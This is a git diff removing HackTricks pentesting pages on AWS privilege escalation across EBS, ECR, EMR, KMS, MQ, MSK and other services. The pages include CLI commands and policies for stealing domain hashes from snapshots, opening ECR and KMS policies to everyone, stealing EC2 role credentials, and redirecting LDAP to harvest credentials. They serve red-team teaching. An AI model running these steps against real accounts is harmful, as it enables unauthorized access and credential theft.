-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md
deleted file mode 100644
index 29cc69d95..000000000
--- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md
+++ /dev/null
@@ -1,53 +0,0 @@
-# AWS - EBS Privesc
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## EBS
-
-### `ebs:ListSnapshotBlocks`, `ebs:GetSnapshotBlock`, `ec2:DescribeSnapshots`
-
-An attacker with those will be able to potentially **download and analyze volumes snapshots locally** and search for sensitive information in them (like secrets or source code). Find how to do this in:
-
-{% content-ref url="../aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md" %}
-[aws-ebs-snapshot-dump.md](../aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md)
-{% endcontent-ref %}
-
-Other permissions might be also useful such as: `ec2:DescribeInstances`, `ec2:DescribeVolumes`, `ec2:DeleteSnapshot`, `ec2:CreateSnapshot`, `ec2:CreateTags`
-
-The tool [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) performs this attack to e**xtract passwords from a domain controller**.
-
-**Potential Impact:** Indirect privesc by locating sensitive information in the snapshot (you could even get Active Directory passwords).
-
-### **`ec2:CreateSnapshot`**
-
-Any AWS user possessing the **`EC2:CreateSnapshot`** permission can steal the hashes of all domain users by creating a **snapshot of the Domain Controller** mounting it to an instance they control and **exporting the NTDS.dit and SYSTEM** registry hive file for use with Impacket's secretsdump project.
-
-You can use this tool to automate the attack: [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) or you could use one of the previous techniques after creating a snapshot.
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md
deleted file mode 100644
index 9a84a0d29..000000000
--- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md
+++ /dev/null
@@ -1,136 +0,0 @@
-# AWS - ECR Privesc
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## ECR
-
-### `ecr:GetAuthorizationToken`,`ecr:BatchGetImage`
-
-An attacker with the **`ecr:GetAuthorizationToken`** and **`ecr:BatchGetImage`** can login to ECR and download images.
-
-For more info on how to download images:
-
-{% content-ref url="../aws-post-exploitation/aws-ecr-post-exploitation.md" %}
-[aws-ecr-post-exploitation.md](../aws-post-exploitation/aws-ecr-post-exploitation.md)
-{% endcontent-ref %}
-
-**Potential Impact:** Indirect privesc by intercepting sensitive information in the traffic.
-
-### `ecr:GetAuthorizationToken`, `ecr:BatchCheckLayerAvailability`, `ecr:CompleteLayerUpload`, `ecr:InitiateLayerUpload`, `ecr:PutImage`, `ecr:UploadLayerPart`
-
-An attacker with the all those permissions **can login to ECR and upload images**. This can be useful to escalate privileges to other environments where those images are being used.
-
-To learn how to upload a new image/update one, check:
-
-{% content-ref url="../aws-services/aws-eks-enum.md" %}
-[aws-eks-enum.md](../aws-services/aws-eks-enum.md)
-{% endcontent-ref %}
-
-### `ecr-public:GetAuthorizationToken`, `ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload`, `ecr-public:InitiateLayerUpload, ecr-public:PutImage`, `ecr-public:UploadLayerPart`
-
-Like the previous section, but for public repositories.
-
-### `ecr:SetRepositoryPolicy`
-
-An attacker with this permission could **change** the **repository** **policy** to grant himself (or even everyone) **read/write access**.\
-For example, in this example read access is given to everyone.
-
-```bash
-aws ecr set-repository-policy \
- --repository-name \
- --policy-text file://my-policy.json
-```
-
-Contents of `my-policy.json`:
-
-```json
-{
- "Version" : "2008-10-17",
- "Statement" : [
- {
- "Sid" : "allow public pull",
- "Effect" : "Allow",
- "Principal" : "*",
- "Action" : [
- "ecr:BatchCheckLayerAvailability",
- "ecr:BatchGetImage",
- "ecr:GetDownloadUrlForLayer"
- ]
- }
- ]
-}
-```
-
-### `ecr-public:SetRepositoryPolicy`
-
-Like the previoous section, but for public repositories.\
-An attacker can **modify the repository policy** of an ECR Public repository to grant unauthorized public access or to escalate their privileges.
-
-{% code overflow="wrap" %}
-```bash
-bashCopy code# Create a JSON file with the malicious public repository policy
-echo '{
- "Version": "2008-10-17",
- "Statement": [
- {
- "Sid": "MaliciousPublicRepoPolicy",
- "Effect": "Allow",
- "Principal": "*",
- "Action": [
- "ecr-public:GetDownloadUrlForLayer",
- "ecr-public:BatchGetImage",
- "ecr-public:BatchCheckLayerAvailability",
- "ecr-public:PutImage",
- "ecr-public:InitiateLayerUpload",
- "ecr-public:UploadLayerPart",
- "ecr-public:CompleteLayerUpload",
- "ecr-public:DeleteRepositoryPolicy"
- ]
- }
- ]
-}' > malicious_public_repo_policy.json
-
-# Apply the malicious public repository policy to the ECR Public repository
-aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json
-```
-{% endcode %}
-
-**Potential Impact**: Unauthorized public access to the ECR Public repository, allowing any user to push, pull, or delete images.
-
-### `ecr:PutRegistryPolicy`
-
-An attacker with this permission could **change** the **registry policy** to grant himself, his account (or even everyone) **read/write access**.
-
-```bash
-aws ecr set-repository-policy \
- --repository-name \
- --policy-text file://my-policy.json
-```
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md
deleted file mode 100644
index acad83823..000000000
--- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md
+++ /dev/null
@@ -1,92 +0,0 @@
-# AWS - EMR Privesc
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## EMR
-
-More **info about EMR** in:
-
-{% content-ref url="../aws-services/aws-emr-enum.md" %}
-[aws-emr-enum.md](../aws-services/aws-emr-enum.md)
-{% endcontent-ref %}
-
-### `iam:PassRole`, `elasticmapreduce:RunJobFlow`
-
-An attacker with these permissions can **run a new EMR cluster attaching EC2 roles** and try to steal its credentials.\
-Note that in order to do this you would need to **know some ssh priv key imported in the account** or to import one, and be able to **open port 22 in the master node** (you might be able to do this with the attributes `EmrManagedMasterSecurityGroup` and/or `ServiceAccessSecurityGroup` inside `--ec2-attributes`).
-
-```bash
-# Import EC2 ssh key (you will need extra permissions for this)
-ssh-keygen -b 2048 -t rsa -f /tmp/sshkey -q -N ""
-chmod 400 /tmp/sshkey
-base64 /tmp/sshkey.pub > /tmp/pub.key
-aws ec2 import-key-pair \
- --key-name "privesc" \
- --public-key-material file:///tmp/pub.key
-
-
-aws emr create-cluster \
- --release-label emr-5.15.0 \
- --instance-type m4.large \
- --instance-count 1 \
- --service-role EMR_DefaultRole \
- --ec2-attributes InstanceProfile=EMR_EC2_DefaultRole,KeyName=privesc
-
-# Wait 1min and connect via ssh to an EC2 instance of the cluster)
-aws emr describe-cluster --cluster-id
-# In MasterPublicDnsName you can find the DNS to connect to the master instance
-## You cna also get this info listing EC2 instances
-```
-
-Note how an **EMR role** is specified in `--service-role` and a **ec2 role** is specified in `--ec2-attributes` inside `InstanceProfile`. However, this technique only allows to steal the EC2 role credentials (as you will connect via ssh) but no the EMR IAM Role.
-
-**Potential Impact:** Privesc to the EC2 service role specified.
-
-### `elasticmapreduce:CreateEditor`, `iam:ListRoles`, `elasticmapreduce:ListClusters`, `iam:PassRole`, `elasticmapreduce:DescribeEditor`, `elasticmapreduce:OpenEditorInConsole`
-
-With these permissions an attacker can go to the **AWS console**, create a Notebook and access it to steal the IAM Role.
-
-{% hint style="danger" %}
-Even if you attach an IAM role to the notebook instance in my tests I noticed that I was able to steal AWS managed credentials and not creds related to the IAM role related.
-{% endhint %}
-
-**Potential Impact:** Privesc to AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile
-
-### `elasticmapreduce:OpenEditorInConsole`
-
-Just with this permission an attacker will be able to access the **Jupyter Notebook and steal the IAM role** associated to it.\
-The URL of the notebook is `https://.emrnotebooks-prod.eu-west-1.amazonaws.com//lab/`
-
-{% hint style="danger" %}
-Even if you attach an IAM role to the notebook instance in my tests I noticed that I was able to steal AWS managed credentials and not creds related to the IAM role related`.`
-{% endhint %}
-
-**Potential Impact:** Privesc to AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md
deleted file mode 100644
index 77979f805..000000000
--- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md
+++ /dev/null
@@ -1,44 +0,0 @@
-# AWS - Gamelift
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-### `gamelift:RequestUploadCredentials`
-
-With this permission an attacker can retrieve a **fresh set of credentials for use when uploading** a new set of game build files to Amazon GameLift's Amazon S3. It'll return **S3 upload credentials**.
-
-```bash
-aws gamelift request-upload-credentials \
- --build-id build-a1b2c3d4-5678-90ab-cdef-EXAMPLE11111
-```
-
-## References
-
-* [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a)
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md
deleted file mode 100644
index ccd34ffa8..000000000
--- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md
+++ /dev/null
@@ -1,154 +0,0 @@
-# AWS - KMS Privesc
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## KMS
-
-For more info about KMS check:
-
-{% content-ref url="../aws-services/aws-kms-enum.md" %}
-[aws-kms-enum.md](../aws-services/aws-kms-enum.md)
-{% endcontent-ref %}
-
-### `kms:ListKeys`,`kms:PutKeyPolicy`, (`kms:ListKeyPolicies`, `kms:GetKeyPolicy`)
-
-With these permissions it's possible to **modify the access permissions to the key** so it can be used by other accounts or even anyone:
-
-{% code overflow="wrap" %}
-```bash
-aws kms list-keys
-aws kms list-key-policies --key-id # Although only 1 max per key
-aws kms get-key-policy --key-id --policy-name
-# AWS KMS keys can only have 1 policy, so you need to use the same name to overwrite the policy (the name is usually "default")
-aws kms put-key-policy --key-id --policy-name --policy file:///tmp/policy.json
-```
-{% endcode %}
-
-policy.json:
-
-```json
-{
- "Version" : "2012-10-17",
- "Id" : "key-consolepolicy-3",
- "Statement" : [
- {
- "Sid" : "Enable IAM User Permissions",
- "Effect" : "Allow",
- "Principal" : {
- "AWS" : "arn:aws:iam:::root"
- },
- "Action" : "kms:*",
- "Resource" : "*"
- },
- {
- "Sid" : "Allow all use",
- "Effect" : "Allow",
- "Principal" : {
- "AWS" : "arn:aws:iam:::root"
- },
- "Action" : [ "kms:*" ],
- "Resource" : "*"
- }
- ]
-}
-```
-
-### `kms:CreateGrant`
-
-It **allows a principal to use a KMS key:**
-
-```bash
-aws kms create-grant \
- --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
- --grantee-principal arn:aws:iam::123456789012:user/exampleUser \
- --operations Decrypt
-```
-
-{% hint style="warning" %}
-A grant can only allow certain types of operations: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations)
-{% endhint %}
-
-{% hint style="warning" %}
-Note that it might take a couple of minutes for KMS to **allow the user to use the key after the grant has been generated**. Once that time has passed, the principal can use the KMS key without needing to specify anything.\
-However, if it's needed to use the grant right away [use a grant token](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token) (check the following code).\
-For [**more info read this**](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token).
-{% endhint %}
-
-```bash
-# Use the grant token in a request
-aws kms generate-data-key \
- --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
- –-key-spec AES_256 \
- --grant-tokens $token
-```
-
-Note that it's possible to list grant of keys with:
-
-```bash
-aws kms list-grants --key-id
-```
-
-### `kms:CreateKey`, `kms:ReplicateKey`
-
-With these permissions it's possible to replicate a multi-region enabled KMS key in a different region with a different policy.
-
-So, an attacker could abuse this to obtain privesc his access to the key and use it
-
-{% code overflow="wrap" %}
-```bash
-aws kms replicate-key --key-id mrk-c10357313a644d69b4b28b88523ef20c --replica-region eu-west-3 --bypass-policy-lockout-safety-check --policy file:///tmp/policy.yml
-
-{
- "Version": "2012-10-17",
- "Id": "key-consolepolicy-3",
- "Statement": [
- {
- "Sid": "Enable IAM User Permissions",
- "Effect": "Allow",
- "Principal": {
- "AWS": "*"
- },
- "Action": "kms:*",
- "Resource": "*"
- }
- ]
-}
-```
-{% endcode %}
-
-### `kms:Decrypt`
-
-This permission allows to use a key to decrypt some information.\
-For more information check:
-
-{% content-ref url="../aws-post-exploitation/aws-kms-post-exploitation.md" %}
-[aws-kms-post-exploitation.md](../aws-post-exploitation/aws-kms-post-exploitation.md)
-{% endcontent-ref %}
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md
deleted file mode 100644
index 3156ba72e..000000000
--- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md
+++ /dev/null
@@ -1,53 +0,0 @@
-# AWS - Mediapackage Privesc
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-### `mediapackage:RotateChannelCredentials`
-
-Changes the Channel's first IngestEndpoint's username and password. (This API is deprecated for RotateIngestEndpointCredentials)
-
-```bash
-aws mediapackage rotate-channel-credentials --id
-```
-
-### `mediapackage:RotateIngestEndpointCredentials`
-
-Changes the Channel's first IngestEndpoint's username and password. (This API is deprecated for RotateIngestEndpointCredentials)
-
-{% code overflow="wrap" %}
-```bash
-aws mediapackage rotate-ingest-endpoint-credentials --id test --ingest-endpoint-id 584797f1740548c389a273585dd22a63
-```
-{% endcode %}
-
-## References
-
-* [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a)
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md
deleted file mode 100644
index 3532b180a..000000000
--- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md
+++ /dev/null
@@ -1,79 +0,0 @@
-# AWS - MQ Privesc
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## MQ
-
-For more information about MQ check:
-
-{% content-ref url="../aws-services/aws-mq-enum.md" %}
-[aws-mq-enum.md](../aws-services/aws-mq-enum.md)
-{% endcontent-ref %}
-
-### `mq:ListBrokers`, `mq:CreateUser`
-
-With those permissions you can **create a new user in an ActimeMQ broker** (this doesn't work in RabbitMQ):
-
-{% code overflow="wrap" %}
-```bash
-aws mq list-brokers
-aws mq create-user --broker-id --console-access --password --username
-```
-{% endcode %}
-
-**Potential Impact:** Access sensitive info navigating through ActiveMQ
-
-### `mq:ListBrokers`, `mq:ListUsers`, `mq:UpdateUser`
-
-With those permissions you can **create a new user in an ActimeMQ broker** (this doesn't work in RabbitMQ):
-
-{% code overflow="wrap" %}
-```bash
-aws mq list-brokers
-aws mq list-users --broker-id
-aws mq update-user --broker-id --console-access --password --username
-```
-{% endcode %}
-
-**Potential Impact:** Access sensitive info navigating through ActiveMQ
-
-### `mq:ListBrokers`, `mq:UpdateBroker`
-
-If a broker is using **LDAP** for authorization with **ActiveMQ**. It's possible to **change** the **configuration** of the LDAP server used to **one controlled by the attacker**. This way the attacker will be able to **steal all the credentials being sent through LDAP**.
-
-```bash
-aws mq list-brokers
-aws mq update-broker --broker-id --ldap-server-metadata=...
-```
-
-If you could somehow find the original credentials used by ActiveMQ you could perform a MitM, steal the creds, used them in the original server, and send the response (maybe just reusing the crendetials stolen you could do this).
-
-**Potential Impact:** Steal ActiveMQ credentials
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md
deleted file mode 100644
index c5a09cb29..000000000
--- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md
+++ /dev/null
@@ -1,52 +0,0 @@
-# AWS - MSK Privesc
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## MSK
-
-For more information about MSK (Kafka) check:
-
-{% content-ref url="../aws-services/aws-msk-enum.md" %}
-[aws-msk-enum.md](../aws-services/aws-msk-enum.md)
-{% endcontent-ref %}
-
-### `msk:ListClusters`, `msk:UpdateSecurity`
-
-With these **privileges** and **access to the VPC where the kafka brokers are**, you could add the **None authentication** to access them.
-
-{% code overflow="wrap" %}
-```bash
-aws msk --client-authentication --cluster-arn --current-version
-```
-{% endcode %}
-
-You need access to the VPC because **you cannot enable None authentication with Kafka publicly** exposed. If it's publicly exposed, if **SASL/SCRAM** authentication is used, you could **read the secret** to access (you will need additional privileges to read the secret).\
-If **IAM role-based authentication** is used and **kafka is publicly exposed** you could still abuse these privileges to give you permissions to access it.
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
